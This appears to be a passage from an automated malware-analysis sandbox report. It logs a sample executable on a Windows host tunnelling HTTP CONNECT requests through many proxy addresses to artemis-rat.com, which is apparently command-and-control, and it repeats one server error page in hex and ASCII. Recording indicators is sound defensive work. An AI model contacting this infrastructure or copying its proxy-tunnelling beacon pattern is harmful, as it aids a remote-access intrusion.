                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:06.333091021 CET806INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:06 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 614
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 40 6c 6f 63 61 6c 68 6f 73 74 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:07.520730972 CET806INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:06 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 614
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 40 6c 6f 63 61 6c 68 6f 73 74 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:08.896740913 CET806INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:06 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 614
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 40 6c 6f 63 61 6c 68 6f 73 74 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:11.712693930 CET806INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:06 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 614
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 40 6c 6f 63 61 6c 68 6f 73 74 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:17.344930887 CET806INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:06 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 614
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 40 6c 6f 63 61 6c 68 6f 73 74 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:28.352719069 CET806INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:06 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 614
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 40 6c 6f 63 61 6c 68 6f 73 74 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:52.160672903 CET806INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:06 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 614
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 40 6c 6f 63 61 6c 68 6f 73 74 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            568192.168.2.55155045.11.95.16560123876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.714649916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            569192.168.2.55168472.210.252.134461643876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.723098993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            570192.168.2.550484103.180.240.4410803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.729785919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            571192.168.2.55064391.142.222.84122663876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.733150005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            572192.168.2.55176038.162.17.12131283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.770910025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
